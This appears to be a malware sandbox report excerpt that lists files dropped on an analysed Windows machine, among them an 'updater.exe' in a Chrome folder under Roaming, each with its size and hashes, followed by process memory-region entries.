C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
Filesize 443B
MD5 8add56521ef894ef0c66ecd3e989d718
SHA1 2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f
SHA256 01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724
SHA512 af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize 2KB
MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 944B
MD5 a8e8360d573a4ff072dcc6f09d992c88
SHA1 3446774433ceaf0b400073914facab11b98b6807
SHA256 bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
SHA512 4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe
-
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
Filesize 461KB
MD5 a999d7f3807564cc816c16f862a60bbe
SHA1 1ee724daaf70c6b0083bf589674b6f6d8427544f
SHA256 8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3
SHA512 6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414
-
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
Filesize 685KB
MD5 081d9558bbb7adce142da153b2d5577a
SHA1 7d0ad03fbda1c24f883116b940717e596073ae96
SHA256 b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA512 2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
C:\Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
Filesize 384KB
MD5 55c797383dbbbfe93c0fe3215b99b8ec
SHA1 1b089157f3d8ae64c62ea15cdad3d82eafa1df4b
SHA256 5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d
SHA512 648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757
-
C:\Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll
Filesize 1.3MB
MD5 8be215abf1f36aa3d23555a671e7e3be
SHA1 547d59580b7843f90aaca238012a8a0c886330e6
SHA256 83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae
SHA512 38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Filesize 4.2MB
MD5 8268ff95b3aaea6d6de8f02a73c323d2
SHA1 ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA512 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
memory/240-181-0x0000000000000000-mapping.dmp
-
memory/796-221-0x0000000000000000-mapping.dmp
-
memory/796-169-0x0000000000000000-mapping.dmp
-
memory/964-222-0x0000000000000000-mapping.dmp
-
memory/964-170-0x0000000000000000-mapping.dmp
-
memory/968-176-0x0000000000000000-mapping.dmp
-
memory/1100-207-0x0000000000000000-mapping.dmp
-
memory/1152-192-0x0000000000000000-mapping.dmp
-
memory/1180-194-0x0000000000000000-mapping.dmp
-
memory/1332-196-0x0000000000000000-mapping.dmp
-
memory/1392-209-0x0000000000000000-mapping.dmp
-
memory/1524-224-0x0000000000000000-mapping.dmp
-
memory/1560-189-0x0000000000000000-mapping.dmp
-
memory/1668-185-0x0000000000000000-mapping.dmp
-
memory/1936-153-0x0000000000000000-mapping.dmp
-
memory/1956-220-0x0000000000000000-mapping.dmp
-
memory/2036-167-0x0000000000000000-mapping.dmp
-
memory/2052-193-0x0000000000000000-mapping.dmp
-
memory/2060-158-0x0000000000000000-mapping.dmp
-
memory/2096-179-0x0000000000000000-mapping.dmp
-
memory/2132-159-0x0000000000000000-mapping.dmp
-
memory/2220-151-0x000002D6AE0A0000-0x000002D6AE4DE000-memory.dmp
Filesize 4.2MB
-
memory/2220-152-0x00007FFCAEF00000-0x00007FFCAF9C1000-memory.dmp
Filesize 10.8MB
-
memory/2284-217-0x0000000000000000-mapping.dmp
-
memory/2320-213-0x0000000000400000-0x0000000000417000-memory.dmp
Filesize 92KB
-
memory/2320-216-0x0000000000400000-0x0000000000417000-memory.dmp
Filesize 92KB
-
memory/2320-214-0x0000000000401BEA-mapping.dmp
-
memory/2320-165-0x0000000000000000-mapping.dmp
-
memory/2348-156-0x00007FFCAEF00000-0x00007FFCAF9C1000-memory.dmp
Filesize 10.8MB
-
memory/2348-155-0x0000025A45F90000-0x0000025A45FB2000-memory.dmp
Filesize 136KB
-
memory/2348-154-0x0000000000000000-mapping.dmp
-
memory/2420-190-0x0000000000000000-mapping.dmp
-
memory/2432-191-0x0000000000000000-mapping.dmp
-
memory/2512-187-0x0000000000000000-mapping.dmp
-
memory/2616-183-0x0000000000000000-mapping.dmp
-
memory/2664-180-0x0000000000000000-mapping.dmp
-
memory/2744-200-0x00007FFCB0A20000-0x00007FFCB14E1000-memory.dmp
Filesize 10.8MB
-
memory/2744-218-0x0000015974EC0000-0x0000015974ED2000-memory.dmp
Filesize 72KB
-
memory/2808-195-0x0000000000000000-mapping.dmp
-
memory/2892-144-0x000000000A060000-0x000000000A0C6000-memory.dmp
Filesize 408KB
-
memory/2892-141-0x0000000008F30000-0x00000000090F2000-memory.dmp
Filesize 1.8MB
-
memory/2892-143-0x0000000009270000-0x00000000092AC000-memory.dmp
Filesize 240KB
-
memory/2892-140-0x0000000006C60000-0x0000000006CC2000-memory.dmp
Filesize 392KB
-
memory/2892-130-0x0000000000BF0000-0x0000000000C28000-memory.dmp
Filesize 224KB
-
memory/2892-147-0x000000000A150000-0x000000000A1CA000-memory.dmp
Filesize 488KB
-
memory/2892-137-0x0000000006600000-0x0000000006622000-memory.dmp
Filesize 136KB
-
memory/2892-136-0x00000000065B0000-0x0000000006600000-memory.dmp
Filesize 320KB
-
memory/2892-135-0x0000000006B40000-0x0000000006BF0000-memory.dmp
Filesize 704KB
-
memory/2892-132-0x0000000006D60000-0x0000000007304000-memory.dmp
Filesize 5.6MB
-
memory/2892-131-0x0000000006120000-0x00000000061B2000-memory.dmp
Filesize 584KB
-
memory/2948-211-0x0000000000000000-mapping.dmp
-
memory/3116-219-0x0000000000000000-mapping.dmp
-
memory/3260-202-0x0000000000000000-mapping.dmp
-
memory/3260-205-0x00007FFCB0A20000-0x00007FFCB14E1000-memory.dmp
Filesize 10.8MB
-
memory/3316-227-0x0000000000000000-mapping.dmp
-
memory/3328-178-0x0000000000000000-mapping.dmp
-
memory/3408-168-0x0000000000000000-mapping.dmp
-
memory/3496-157-0x0000000000000000-mapping.dmp
-
memory/3500-223-0x0000000000000000-mapping.dmp
-
memory/3520-226-0x0000000000000000-mapping.dmp
-
memory/3564-182-0x0000000000000000-mapping.dmp
-
memory/3568-186-0x0000000000000000-mapping.dmp
-
memory/3620-201-0x0000000000000000-mapping.dmp
-
memory/3928-160-0x0000000000000000-mapping.dmp
-
memory/3964-175-0x0000000000000000-mapping.dmp
-
memory/4040-206-0x0000000000000000-mapping.dmp
-
memory/4104-163-0x0000000000000000-mapping.dmp
-
memory/4104-210-0x0000000000000000-mapping.dmp
-
memory/4220-148-0x0000000000000000-mapping.dmp
-
memory/4256-225-0x0000000000000000-mapping.dmp
-
memory/4388-177-0x0000000000000000-mapping.dmp
-
memory/4416-172-0x0000000000000000-mapping.dmp
-
memory/4440-212-0x0000000000000000-mapping.dmp
-
memory/4444-188-0x0000000000000000-mapping.dmp
-
memory/4588-184-0x0000000000000000-mapping.dmp
-
memory/4636-208-0x0000000000000000-mapping.dmp
-
memory/4692-161-0x0000000000000000-mapping.dmp
-
memory/4700-166-0x0000000000000000-mapping.dmp
-
memory/4776-162-0x0000000000000000-mapping.dmp
-
memory/4780-171-0x0000000000000000-mapping.dmp
-
memory/4884-164-0x0000000000000000-mapping.dmp
-
memory/4896-174-0x0000000000000000-mapping.dmp
-
memory/4984-173-0x0000000000000000-mapping.dmp
-
memory/4984-228-0x0000000140000000-0x0000000140803000-memory.dmp
Filesize 8.0MB
-
memory/4984-230-0x0000000140000000-0x0000000140803000-memory.dmp
Filesize 8.0MB
-
memory/4984-229-0x000000014036DAD4-mapping.dmp
-
memory/4984-231-0x0000000140000000-0x0000000140803000-memory.dmp
Filesize 8.0MB
-
memory/4984-232-0x0000000000540000-0x0000000000560000-memory.dmp
Filesize 128KB
-
memory/4984-233-0x0000000140000000-0x0000000140803000-memory.dmp
Filesize 8.0MB
-
memory/4984-234-0x0000000002390000-0x00000000023D0000-memory.dmp
Filesize 256KB